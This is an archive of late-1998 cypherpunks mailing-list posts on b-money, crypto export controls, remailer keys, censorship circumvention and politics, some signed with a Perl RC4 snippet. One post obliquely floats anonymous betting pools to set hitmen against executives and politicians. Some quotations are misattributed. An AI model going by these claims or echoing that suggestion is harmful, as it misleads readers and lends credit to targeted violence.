Subject: Re: Wei Dei's "b-money" protocol
In-Reply-To: <199812051937.TAA12780@server.eternity.org>
Message-ID: <19981206154903.B26047@eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain



On Sun, Dec 06, 1998 at 12:08:04AM +0000, Adam Back wrote:
> (1) Inflation -- the cost of hardware to compute a given collision
> falls in line with Moores law.  Perhaps one could get around this by
> defining a b-money unit to require more computational effort over
> time.  Say define 1 b-money unit to be the computational effort of 1
> months compute on the most efficient hardware that can be bought for
> $1000 at current prices and state of hardware.

Actually this problem has already been accounted for in the protocol. The
amount of b-money you create when you burn some CPU time depends on the
relative cost of CPU time verses a standard basket of goods. As the cost
of computation falls relative to that basket, the amount of CPU time
needed to create a unit of b-money automaticly rises. So the result is
that there should be no inflation with b-money, unless the b-money economy
shrinks or the velocity of b-money increases (because it's not possible to
reduce the b-money money supply). 

> (3) Linkability -- although the participants are anonymous, their
> transactions are linkable and so participants are pseudonymous in
> b-money (linkable anonymity being pseudonymity).  This is inherent
> because of the need to broadcast transactions to ensure the open book
> entry is updated.
> 
> (4) You can get money in -- by buying hardware -- but it will cost
> different people different amounts.  If I am using an existing general
> purpose workstation my units will cost more than if I buy custom
> hardware.  Not so bad a problem, just view this as an economy of
> scale, or a bulk discount.
> 
> (5) Getting money in by buying hardware works, but people don't want
> the inconvenience of buying custom hardware, they would rather just
> buy b-money for force-monopoly backed money (national currencies).  If
> we setup a mint which made it it's business to buy up-to-date custom
> hardware it would be difficult to buy b-money anonymously because the
> pseudonym would reveal his identity by the use of traceable payment
> systems (credit card, cheque, wire transfer, etc).
> 
> (6) Getting money out is difficult also.  The pseudonymous b-money
> user would find it difficult to obtain force-monopoly money without
> revealing his identity.

Problems 3-6 can be solved with my payment-mix idea. This is simply a
Chaumian mint where people buy blinded ecash with b-money and then sell it
back a little later under a different pseudonym. Presto your b-money is no
longer linkable. The nice thing about this mint is that you don't have to
trust it very much since it should have very few outstanding obligations
at any one time. What obligations it does have of course can be backed
with b-money.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Cordian <emc@wire.insync.net>
Date: Mon, 7 Dec 1998 07:00:45 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Aharonov-Bohm Effect
In-Reply-To: <199812061706.LAA29544@wire.insync.net>
Message-ID: <199812062227.QAA30068@wire.insync.net>
MIME-Version: 1.0
Content-Type: text/plain



Here's a reference to a conference session I just found on the Web.
The presenters claim that prior demonstrations of the A-B effect were
bogus, produced by the magnetic field of the moving particle
interacting directly with the adjacent magnetic field.
 
It also states that no evidence of a magnetic vector potential acting
on a particle in the absence of a magnetic field has ever been
demonstrated.
 
Any comments?
 
-----
 
Session K19 - Magnetic Modeling II.
MIXED session, Wednesday afternoon, March 19
Room 2206, Conv. Center
 
[K19.04] Ehrenberg-Siday-Aharonov-Bohm (ESAB) Effect Has Not Been Observed
 
Gordon R. Freeman, Larry D. Coulson (University of Alberta)
 
The beautiful results from two types of experiment that were claimed
to confirm the existence of the (misnamed) Aharonov-Bohm Effect, with
coherent electrons in split beams (Tonomura amp; co.) and split
conductors (Webb amp; co.), are explained quantitatively by the energy
of interaction of the magnetic field produced by the moving electrons
with the magnetic flux of the adjacent applied field. The electron
velocities (and phases) change by opposite amounts in the two parts of
the split beam, and de Broglie wave interference occurs in the
rejoined beam. No effect of a magnetic vector potential in the absence
of a magnetic field has been demonstrated, so the ESAB Effect has not
been demonstrated to exist.

-- 
Sponsor the DES Analytic Crack Project
http://www.cyberspace.org/~enoch/crakfaq.html




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Joel O'Connor" <ogrenivek@yahoo.com>
Date: Mon, 7 Dec 1998 09:06:39 +0800
To: HyperReal-Anon <nobody@sind.hyperreal.art.pl>
Subject: Re: What was the quid pro quo for Wassenaar countries?
Message-ID: <19981207003454.25653.rocketmail@send104.yahoomail.com>
MIME-Version: 1.0
Content-Type: text/plain



As Karl Marx said also, "Democracy is a slow form of communism." 
That's why the forfathers decided to make us a republic, something
many have forgotten.  




---HyperReal-Anon <nobody@sind.hyperreal.art.pl> wrote:
>
> "Phillip Hallam-Baker" <hallam@ai.mit.edu> writes
> 
>    John Gilmore may be right, but remember folks that in Europe we
>    have this thing the Greeks invented called democracy. One of the
>    ideas of democracy is that decisions are not made in secret closed
>    meetings.
> 
> Yes, and people democratically demand government enforcement of the
> majority will, something made more difficult if the subjects have
> strong cryptography.
> 
> As Donn Parker observed several years ago, strong cryptography is
> inconsistent with democracy.  (Published in Scientific American ---
> reference on request.)
> 
> John Gilmore <gnu@toad.com> writes
> 
>    Some countries actually seem to care what their citizens think
>    about their crypto laws, unlike the shining example of democracy,
>    the USSA.  And when we educate the citizens, they tend to make the
>    right choices.  Let's keep trying.
> 
> But don't educate them too much, or they will understand that
> cryptography can set people free, and if people were free there would
> be no political government, and if there were no political government
> their social security checks would stop coming, along with all their
> other government ``benefits''.
> 
> 

==
Ogre bounces like sonar. . .Peace.
                  Ogre

_________________________________________________________
DO YOU YAHOO!?
Get your free @yahoo.com address at http://mail.yahoo.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pilgrim@laguna.com.mx
Date: Tue, 8 Dec 1998 20:21:51 +0800
To: Ryan Lackey <cypherpunks@Algebra.COM
Subject: Re: (eternity) eternity using politics rather than economics
In-Reply-To: <19981205164842.B25348@arianrhod.@>
Message-ID: <3.0.3.32.19981206185851.007b03f0@laguna-01.laguna.com.mx>
MIME-Version: 1.0
Content-Type: text/plain



At 04:48 PM 12/05/1998 -0400, Ryan Lackey wrote:
At 04:48 PM 12/05/1998 -0400, you wrote:

>When I was working on Eternity DDS stuff, I basically came to the same
>conclusion as Adam -- without anonymous bearer cash, you can't do
>a workable eternity implementation.

Without abs you can't get a workable freedom implementation.

[...]

>As far as I can tell, having a good Eternity implementation is still
>blocked on getting a reasonable electronic cash system.  There are
>some people in Anguilla...

...and elsewhere.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Antonomasia <ant@notatla.demon.co.uk>
Date: Mon, 7 Dec 1998 04:09:37 +0800
To: cypherpunks@Algebra.COM
Subject: Key changes at notatla
Message-ID: <199812061934.TAA02414@notatla.demon.co.uk>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1



New mix keys at notatla already in use.
Old ones expire 21Dec1998.


mccain mccain@notatla.demon.co.uk 49894e1cc7629bbb54a3b5f98ba6f6d6 2.0.4b41 MC

- -----Begin Mix Key-----
49894e1cc7629bbb54a3b5f98ba6f6d6
258
AASe8KR46cRA75Jk4YMcE32gpS1uqAveFpRxPVg7
qATY4aPIyVM40QHa/OrHdVc8twmKMNemcdZNCpdb
EDCtaVXLalJ7njbiLs8NMAEVP7WxMQP+1swjvHpR
qP1ikuvy89iNpTbDtl9uf11PNeXiWclrCyFkvS6m
4cXFPskXoa4xWQAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAQAB
- -----End Mix Key-----


teatwo teatwo@notatla.demon.co.uk 4568791f20d5e004225c78e04625bca4 2.0.4b41 MC

- -----Begin Mix Key-----
4568791f20d5e004225c78e04625bca4
258
AATVHyCqv2SGgaEbY0HVnBONNsSQwElFCdvSyxhq
cGL4FZ5A1LGBAGNN+aHnfw0X8hvNsFB7EcmBsZ1v
fUt64xRG5gy2+A3rMlad36iZfqrNBKncGh+Y/uEx
nb+hTyANZNlHsUdAfo+lozx0xoB070e6K3rkgxDG
GytOW9VjDTVR3QAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAQAB
- -----End Mix Key-----


-----BEGIN PGP SIGNATURE-----
Version: PGP 5.0i
Charset: noconv

iQA/AwUBNmrcCTROc55Xv6voEQIs4ACeOat7f/0Kn5gLPazrp6rd+gGgsdEAn0nJ
4jhmxQQTvZWFg7d+BxM7WHHR
=pz5z
-----END PGP SIGNATURE-----

--
##############################################################
# Antonomasia   ant@notatla.demon.co.uk                      #
# See http://www.notatla.demon.co.uk/                        #
##############################################################




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Stu Green <stugreen@realtime.net>
Date: Mon, 7 Dec 1998 04:13:48 +0800
To: alg <cypherpunks@EINSTEIN.ssz.com
Subject: The Open Source Initiative needs your help [FYI  -  Stu]
Message-ID: <366ADC4D.E7CA2ACC@realtime.net>
MIME-Version: 1.0
Content-Type: text/plain




Subject: The Open Source Initiative needs your help
From: "Eric S. Raymond" <esr@thyrsus.com>
Date: Thu,  3 Dec 1998 19:48:39 GMT
Approved: linux-announce@news.ornl.gov (Mikko Rauhala)
Followup-To: comp.os.linux.misc
Newsgroups: comp.os.linux.announce
Old-Date: Mon, 30 Nov 1998 23:19:37 -0500
Organization: Eric Conspiracy Secret Labs
Xref: cyclone.swbell.net comp.os.linux.announce:3567

-----BEGIN PGP SIGNED MESSAGE-----


The Open Source Initiative needs your help.

The Open Source certification mark is a valuable tool for turning on
everybody interest in software on to our way of doing things.  But for
it to keep working, we have to make sure it doesn't get legally diluted.
(This is a legal requirement; if we don't enforce the mark, we lose it.)

We're a handful of unpaid volunteers.  There are a lot of potential 
diluters out there.  We need you to help us keep an eye on them.

If you see the term `Open Source' (or even the lower-case
`open-source') being used to describe software with distribution
conditions that don't fit the Open Source Definition, please
inform us at 

	mark-misuse@opensource.org

All the misuses we've seen so far are accidental.  We gently set those
people straight.  In the process, we try to educate them and
bring them fully into the open-source community.  If there is
ever deliberate or malicious abuse, we will be ready to do what
is necessary on behalf of the community.

Thanks in advance.
- -- 
		Eric S. Raymond

The American Republic will endure, until politicians realize they can
bribe the people with their own money.
	-- Alexis de Tocqueville



- -- 
This article has been digitally signed by the moderator, using PGP.
http://www.iki.fi/mjr/cola-public-key.asc has PGP key for validating signature.
Send submissions for comp.os.linux.announce to: linux-announce@news.ornl.gov
PLEASE remember a short description of the software and the LOCATION.
This group is archived at http://www.iki.fi/mjr/linux/cola.html

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3ia
Charset: latin1

iQCVAgUBNmbrGFrUI/eHXJZ5AQGXPwQAszpIGeQE6YMeHvlgKCUm285yTsaR84kj
K0ZHh6Eu50kpqIfNI3kuJt9ufqM+jPZhiYxNFdT+BtcbEqPGaGLdrD1xqAM6gVY+
6Ht90AzHrdiwx2Tdlpg1oZo32obiWHLgb5eO4rOeQkmcmmuonKRKb1yNGagnhmbZ
a6y3SgRqOoI=
=pLE9
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Blanc" <blancw@cnw.com>
Date: Mon, 7 Dec 1998 12:18:37 +0800
To: <cypherpunks@cyberpass.net>
Subject: RE: tyranny of corporations
In-Reply-To: <199812062342.PAA05825@netcom13.netcom.com>
Message-ID: <000301be2196$63893520$838195cf@blanc>
MIME-Version: 1.0
Content-Type: text/plain



>From Vladimir Z. Nurvis, Token Cpunk Socialist:

[quoting Robert Weissman]
: Derber is a bit too modest to say it, so we will: perhaps the 
: best way to rebuild a strong, vibrant and populist movement is to get 
: this book into the hands of people who care about democracy. The 
: corporations have us on the run, but we should pause for a moment
: or two, find a quiet place, and read this book.
...........................................


The corporations have us on the run, but we should pause for a moment
or two, find a quiet place, and start our own Virtual Company.


   ..
Blanc 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steve Schear <schear@lvcm.com>
Date: Mon, 7 Dec 1998 13:08:55 +0800
To: cypherpunks@cyberpass.net
Subject: Re: tyranny of corporations (was: Corporate Nations)
Message-ID: <v04003a00b290e4af9eda@[24.1.50.17]>
MIME-Version: 1.0
Content-Type: text/enriched

 The hitman image certainly rings true for some top execs I've met. I  recall a session with a corporate sociologist many years ago (the company was going through one of those team-building bullshit affairs). I had completed a psychological profile tests and we were reviewing the results. She was given to occasional black humor and on this particular occasion told me she has some good news and some bad news, asking which I prefered hearing first. I selected the good news, whereupon she said that my profile was an exact match with those who reach the highest levels of the corporate world. Then the bad news, its also the profile of a master criminal. I kid you not.

As to hyperindividualism, Robert Bork covered this topic in his recent book Slouching Toward Gamorah. In it he identified two idiological diseases infecting America: radical equality and radical egalitarianism (i.e., hyperindividualism). Both, in his opinion, are a result of a warped evolution of 20th Century liberalism.

Since many in our society seek to emulate these hitmen (i.e., get a piece of the rock at any cost) and have no more scruples themselves than those to whom they aspire, anonymous betting pools could harness the more extreme members in a populist fashion to counterbalance our new age robber barrons and politicians. 

The solution to hyperindividualism isn't regulation (which can be blunted or co-opted by those with the bucks) but allowing those below to profitably advance at the expense of those at the top. Dynamic equilibrium in a new marketplace. Sort of like the way Klingons get field rank advancements.

--Steve



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alan@clueserver.org>
Date: Mon, 7 Dec 1998 13:13:23 +0800
To: cypherpunks@Algebra.COM
Subject: At a Comic Shop near you...
Message-ID: <3.0.5.32.19981206205339.039facd0@clueserver.org>
MIME-Version: 1.0
Content-Type: text/plain



This may or may not be of interest...

Spy v.s. Spy action figures are now available!  There is a black spy and a
white spy (sorry, no grey spy).  Each comes with lots of gadgets (knives,
blackjacks, saws and a bomb).  Each spy has "bomb throwing action".

They are distributed through comic shops at the moment.  They sold out
pretty quick where I got mine, so you will not want to wait if you want one.

---
|      Bill Clinton - Bringing back the Sixties one Nixon at a time!     |
|"The moral PGP Diffie taught Zimmermann unites all| Disclaimer:         |
| mankind free in one-key-steganography-privacy!"  | Ignore the man      |
|                                                  | behind the keyboard.|
|         http://www.ctrl-alt-del.com/~alan/       |alan@ctrl-alt-del.com|




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Secret Squirrel <secret_squirrel@nym.alias.net>
Date: Mon, 7 Dec 1998 06:00:34 +0800
To: cypherpunks@cyberpass.net
Subject: SHANGHAI ENTREPRENEUR TRIED IN CHINA
Message-ID: <6a14bed1b17c17c83c7e0f7ade41d93e@anonymous>
MIME-Version: 1.0
Content-Type: text/plain



The Chinese government has put 30-year-old Shanghai computer 
software businessman Lin Hai on trial for "inciting the 
overthrow of state power" by providing 30,000 e-mail addresses 
to a U.S. Internet magazine called "Big Reference" published by 
Chinese dissidents.  Chinese authorities closed the four-hour 
trial for what it said were "national security" reasons, and 
"persuaded" one member of Lin's legal team not to attend the 
trial.  Lin's wife Xu Hong, who was questioned by the police 
for six hours, has indicated that Lin's lawyer "said he didn't 
have a very good feeling -- that things won't be good for Lin 
and he will probably be found guilty."  
(Washington Post 5 Dec 98)

#!/usr/local/bin/perl -0777-- -export-a-crypto-system-sig -RC4-3-lines-PERL
@k=unpack('C*',pack('H*',shift));for(@t=@s=0..255){$y=($k[$_%@k]+$s[$x=$_
]+$y)%256;&S}$x=$y=0;for(unpack('C*',<>)){$x++;$y=($s[$x%=256]+$y)%256;
&S;print pack(C,$_^=$s[($s[$x]+$s[$y])%256])}sub S{@s[$x,$y]=@s[$y,$x]}




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Secret Squirrel <secret_squirrel@nym.alias.net>
Date: Mon, 7 Dec 1998 06:12:06 +0800
To: cypherpunks@cyberpass.net
Subject: MITNICK TRIAL POSTPONED AGAIN
Message-ID: <a9b4550267588bc9982e13133b454db6@anonymous>
MIME-Version: 1.0
Content-Type: text/plain



The long-awaited trial of Kevin Mitnick, the accused computer 
hacker indicted on 25 counts of "stealing, copying, and 
misappropriating proprietary computer software" from a number 
of cellular and computer companies, has been postponed until 
April 20 after Mitnick's lawyer asked for more time to prepare 
his case.  The trial was slated to begin on January 19.  Mitnick 
has been in jail in Los Angeles awaiting trial since February 
1995. 

- Los Angeles Times 4 Dec 98



#!/usr/local/bin/perl -0777-- -export-a-crypto-system-sig -RC4-3-lines-PERL
@k=unpack('C*',pack('H*',shift));for(@t=@s=0..255){$y=($k[$_%@k]+$s[$x=$_
]+$y)%256;&S}$x=$y=0;for(unpack('C*',<>)){$x++;$y=($s[$x%=256]+$y)%256;
&S;print pack(C,$_^=$s[($s[$x]+$s[$y])%256])}sub S{@s[$x,$y]=@s[$y,$x]}




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>n@o.p
Date: Mon, 7 Dec 1998 05:57:44 +0800
To: cypherpunks@Algebra.COM
Subject: Crypto deterrents
Message-ID: <199812062121.WAA24707@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



White men traded as 'sex slaves' of black prisoners
By Fergal Keane, in Illinois


WHITE male prisoners in American jails are being "sold as sex slaves" by
black fellow inmates for money, tobacco, drugs and alcohol, according to
campaigners who are urging action to end widespread homosexual rape
behind bars.

Damaging claims of complicity by prison guards are also emerging. Five
wardens at a Californian maximum security jail are facing charges
relating to the rape of an inmate by a notorious sexual predator. The
wardens allegedly forced a troublesome prisoner to share a cell with a
black gang leader, who was rewarded with extra food and clothes for
imposing "discipline" on the man.

According to the campaigners, the sex attacks often carry ugly racial
overtones, with many white prisoners claiming that they were sexually
abused after being placed in cells with black inmates. Most victims are
too scared to complain, it is claimed, and those that do say they have
been ignored by the authorities. The scale of the scandal has been
uncovered by the pressure group Human Rights Watch, which next year will
publish a report documenting the "staggering prevalence" of prison rape.

The situation is not just provoking concern among civil liberties
groups. In the state of Illinois, a prominent conservative figure,
Republican legislator Cal Skinner, is also pushing for tougher
government action. He claims that many of the rape victims have been
infected with the HIV virus and that American prisons are becoming a
breeding ground for Aids.

Mr Skinner said: "There are sexual slaves in too many prisons. People
are being given a death sentence." He wants to see the mandatory Aids
testing of all prisoners with the segregation of those found to be HIV
positive. He believes it is one of the few ways of protecting vulnerable
inmates from the potentially fatal effect of prison rape.

The renewed concern over rape in prisons has come too late for Michael
Blucker, 29, a white man from Crystal Lake in Illinois, who was
repeatedly gang-raped while serving a sentence for burglary. Blucker's
ordeal is almost too horrific to contemplate: he was forced to become a
sex slave to black prisoners at Menard State Penitentiary in Illinois.
Prison rape is not confined to white victims but they are particularly
vulnerable as black gang members make up such a large part of the
American prison population.

Blucker said: "I was the only white man in a gallery [wing] of more than
100 prisoners. Most of the guys were in for very serious crimes; they
were people who weren't going to be getting out of there any time in the
next 30 years." The first attack came when Blucker had been in jail just
two weeks. He was set upon by three black prisoners, stripped, beaten
and raped.

"They would have killed me if I had refused. Killing means nothing to
these people," he said. Once it became known that he had been raped,
Blucker's life became even more of a nightmare. In the violent world of
American prisons, an inmate who "allows" himself to be raped is regarded
as fair game for every other inmate and is used as a sex slave, normally
under the direction of a senior gang leader.

In Blucker's case, one of the black prisoners sold him to other inmates
on a daily basis. "He would physically threaten me and threaten to have
harm done to my wife outside prison. Every day, I would be sold as a sex
object while he was given money and cigarettes and marijuana and alcohol
in return." When the threats of violence did not cow Blucker, his
tormentor would beat him into submission.

While filming in Butner prison in North Carolina, I met Ivory Rhodes, a
black prisoner, who was attacked within days of being placed in the cell
of a known rapist. The pattern he described was almost exactly the same
as that experienced by Blucker. A violent attack and the threat of death
followed by brutal rape. Rhodes's solution was to try to spend long
periods in solitary confinement, a deprivation he preferred to risking
his life in the main cells.

Rhodes managed to avoid being raped again, but whenever he was
transferred from one prison to another, the stigma of "rape victim" went
with him. After his rape, Rhodes never moved out of his cell without
carrying a knife. He described a world in which any weakness is preyed
upon by the tougher and older inmates. The young, the first-time
offenders, the middle class are especially vulnerable to attack.

Blucker said: "There are people who say that if somebody attacked them
in prison they would kill themselves or kill other people. That is bull.
It just doesn't happen that way."

What was almost certainly his worst experience occurred in the showers
when he was set upon by a large gang of prisoners. "They pulled bricks
out of the wall and they hit me in the nose and the eye and then on the
back of the head, which knocked me out." Then he was repeatedly raped.
"I couldn't tell you if it was one, three, 10 or 15 people. All I know
is that I felt very unwell."

At first, Blucker said, he was too frightened to report the rapes for
fear of being killed by the other inmates, but after the shower incident
he spoke to prison officials. The result, he claimed, was indifference.
"I spoke to officers and medical people and no one believed me."

Blucker subsequently took a court action against several prison guards
and the prison psychiatrist but was unable to prove his claims. What is
not disputed is that he needed extensive surgery for injuries sustained
in the attack and that while in prison he contracted the HIV virus.

Blucker was eventually transferred from Menard after lobbying a local
politician. Now a free man, he is looking for a job and is actively
involved in his church. God, he says, will save him from Aids.

Fergal Keane is a BBC Special Correspondent




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bennett Haselton <bennett@peacefire.org>
Date: Mon, 7 Dec 1998 14:06:40 +0800
To: cypherpunks@sirius.infonex.com
Subject: DSA for encryption
Message-ID: <3.0.5.32.19981206222557.00913960@h.mail.vanderbilt.edu>
MIME-Version: 1.0
Content-Type: text/plain



Hi,

	I'm working on an enhancement to a Web-based program that allows you to
circumvent proxy server censorship by sending a request for a Web page to a
computer in the outside world that is not blocked by the proxy, and having
that computer re-send a copy of the banned page back to you.

	The current version of the software, written by Brian Ristuccia this past
summer, is at
	http://ians.ml.org:8801

where you type a URL into the form, submit it, and the resulting page has a
URL like:
	http://ians.ml.org:8801/aHR0cDovL3d3dy55YWhvby5jb20=
instead of
	http://anon.free.anonymizer.com/http://www.yahoo.com/
which is what Anonymizer gives you, which makes it obvious what you were
looking at to anyone who looks through the proxy server logs.

	Of course, any manufacturer of Internet censorship proxy server software
could easily add ians.ml.org to their list of blocked sites (as they have
all already done with Anonymizer), so the idea would be for people to get
their friends to set up port-forwarding programs on computers that were not
blocked by the censoring proxy, and those could be set up to relay requests
between the IANS server and the computer behind the proxy server.

	The general outline for this scheme is at
		http://www.peacefire.org/bypass/Proxy/
and the current version of IANS ("Internet Alternate Name Space") is part
of the way towards implementing this (theoretically) bulletproof solution.

The major pending improvements to the IANS software are (1) the URL is not
truly encrypted; the garbled characters in the URL above just represent
some basic scrambling to evade detection by people who sweep their proxy
server log files for keywords, (2) even if the URL were really encrypted,
when you first fill out the form, the URL is submitted to IANS in the
clear, so it could be detected by any censoring proxy server that logs data
submitted by GET or POST.  One Internet censorship proxy server called
SmartFilter already does this and blocks you from submitting *any* banned
URL's using GET or POST, so IANS does not work with SmartFilter, for example.

I am working on a JavaScript form that could be used on the client side to
solve this problem.  We would like to use DSA to encrypt the requests sent
using IANS, since I've heard DSA can be used for encryption without
royalties, unlike, for example, RSA.

Does anybody know of a Web page that explains how the DSA algorithm can be
used for encryption, as opposed to message signing and authentication?  I
found a page at
http://www1.shore.net/~ws/Extras/Security-Notes/lectures/authent.html

that describes the DSA algorithm for signature verification.  I have looked
very hard but have been unable to find a page about how to use DSA for
encryption.  Can anyone help?

I know there is software like GNU Privacy Guard that implements DSA for
encryption, but the source code is 3 megabytes and I was hoping there was a
page that explains the process more simply than that.

	-Bennett

bennett@peacefire.org    (615) 421 5432    http://www.peacefire.org




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Blanc" <blancw@cnw.com>
Date: Mon, 7 Dec 1998 15:36:15 +0800
To: <cypherpunks@cyberpass.net>
Subject: RE: tyranny of corporations (was: Corporate Nations)
In-Reply-To: <v04003a00b290e4af9eda@[24.1.50.17]>
Message-ID: <000601be21b0$b087c0c0$838195cf@blanc>
MIME-Version: 1.0
Content-Type: text/plain




From 
Steve Schear:
<FONT color=#0000ff face=Arial 
size=2> 
The solution to hyperindividualism isn't 
regulation (which can be blunted or co-opted by those with the bucks) but 
allowing those below to profitably advance at the expense of those at the top. 
Dynamic equilibrium in a new marketplace. Sort of like the way Klingons get 
field rank advancements.
<FONT color=#0000ff face=Arial 
size=2>.................................
<FONT color=#0000ff face=Arial 
size=2> 
 
What 
do you mean, Steve, "at the expense of those at the top"?   
(I'm not aware of how the Klingons get their field rank 
advancements).
<FONT color=#0000ff face=Arial 
size=2> 
Also, 
this image of hyperindividualism doesn't seem right.  I would think such an 
extreme degree of individualism would exclude much involvement with others, 
meaning they could not run corporations, because for a business to exist 
requires involvement in providing a service/product to the largest numbers of 
the population as possible,  and they can only do this if this large mass 
of people see the value of, and accept, in preference to the offerings of the 
competition, what that particular corporation offers.  
<FONT color=#0000ff face=Arial 
size=2> 
I 
imagine a hyperindividual more as an independent contractor working 
"alone".
   ..Blanc 


From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Hohensee <michael@sparta.mainstream.net>
Date: Mon, 7 Dec 1998 09:40:58 +0800
To: cypherpunks@cyberpass.net
Subject: Re: y2k/gary north delusions
In-Reply-To: <199812062023.PAA001.79@whgiii>
Message-ID: <366B17BF.963FFEA@sparta.mainstream.net>
MIME-Version: 1.0
Content-Type: text/plain



"William H. Geiger III" wrote:
>
> Why anyone would want to live like a rat is beyond me.
> 

And me.  Sadly, I have little choice, as I'm stuck with attending NYU
for the present.  That shouldn't be a problem soon, assuming I succeed
in transferring to a nicer place.

Michael Hohensee





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@nowhere.to>
Date: Mon, 7 Dec 1998 05:01:38 +0800
To: cypherpunks@cyberpass.net
Subject: Wassenaar Encryption Agreement
Message-ID: <7fed2e22ddfc4bef12e88799314a479f@anonymous>
MIME-Version: 1.0
Content-Type: text/plain



The United States and 32 other nations that belong to a group 
called the Wassenaar Arrangement, which coordinates export 
policies for technologies that have both civilian and military 
use, have signed an agreement restricting exports of encryption 
technology from their countries.  The Clinton administration, 
which has already imposed such controls in this country, says 
the agreement will help American companies compete on a more 
equal footing with their counterparts abroad.  Privacy 
organizations are critical of the agreement, and a counsel for 
the advocacy group Americans for Computer Privacy says there 
will still be enormous differences in how the countries put the 
agreement into practice.  


(Washington Post 4 Dec 98)


#!/usr/local/bin/perl -0777-- -export-a-crypto-system-sig -RC4-3-lines-PERL
@k=unpack('C*',pack('H*',shift));for(@t=@s=0..255){$y=($k[$_%@k]+$s[$x=$_
]+$y)%256;&S}$x=$y=0;for(unpack('C*',<>)){$x++;$y=($s[$x%=256]+$y)%256;
&S;print pack(C,$_^=$s[($s[$x]+$s[$y])%256])}sub S{@s[$x,$y]=@s[$y,$x]}




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Tue, 8 Dec 1998 00:48:14 +0800
To: dcsb@ai.mit.edu
Subject: Re: Commerce Hacked?
Message-ID: <v04020a16b2917b7e5b43@[139.167.130.248]>
MIME-Version: 1.0
Content-Type: text/plain




--- begin forwarded text


Date: Sun, 6 Dec 1998 23:14:13 -0500 (EST)
From: Somebody
To: Robert Hettinga <rah@shipwright.com>
Subject: Re: Commerce Hacked?
Mime-Version: 1.0



Looks like he [Aaron] has been successful. No one is talking about the
extortive
quality of sending out the commerce minister to argue for crypto controls.
Why don't they send an air force general who giggles about radiated cities
between bites of rumaki.

<Somebody's .sig>

--- end forwarded text


-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bill payne <billp@nmol.com>
Date: Mon, 7 Dec 1998 23:47:49 +0800
To: abd@CDT.ORG
Subject: US attorney notified
Message-ID: <366BE794.2F54@nmol.com>
MIME-Version: 1.0
Content-Type: text/plain

Michell was notified that we are in the process of initiating
legal action to get the lien removed.

Let's hope she has the sense to do what we ask.

This matter should have been settled.  It is getting WORSE.



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Mon, 7 Dec 1998 22:45:23 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: What was the quid pro quo for Wassenaar countries? (fwd)
Message-ID: <199812071414.IAA04296@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Mon, 07 Dec 1998 08:21:21 -0500
> From: John Young <jya@pipeline.com>
> Subject: Re: What was the quid pro quo for Wassenaar countries?

> More interesting to Americans, maybe, is that there also appears to be
> an effort to boost domestic militia, particularly the religious brand, as the
> homefront Bin Laden. The rise of religion-based terrorism is explored at
> length in Bruce Hoffman's recent "Inside Terrorism." Hoffman claims that
> religious terrorists may be the worst enemies ever, for they do not 
> believe in political compromise: they want to kill every single opponent,
> and have no reservations about using WMD.

5,000 years of human history bears this thesis out.

> If this theory is correct (and Hoffman has worked with RAND for years on
> the issue) then the menace of terrorism is worse than that hawked during
> the Cold War. The enemy is not distant, not even ICBM seconds away,
> but rather it lives amongst us, it's our neighbors readying Armageddon not
> merely a familiar commie takeover. 

This is also their biggest weakness. It's one reason the US has never been
host to a large movement in the 20th century, outside the racist,
anti-communist, and pro-lifers (and the first two are pretty much dead)
because your neighbor probably doesn't go to the same church you do, probably
not from the same part of the country. The chances of an individual opening
up to their neighbor and getting a warm reception for bombing someplace is
pretty low.

Realisticaly, the only reason the pro-lifers get as warm a reception as they
do is so many people see it as hypocritical. It's ok to kill a killer is
their thinking, it is after all a form of pre-partum assissted self-defence.

> Hoffman says to expect more OKCs around the globe. To be sure, that's
> his business to say that.

Considering the rate at which they occur now there is zero rational reason
to believe these groups will cease any time in the near future.


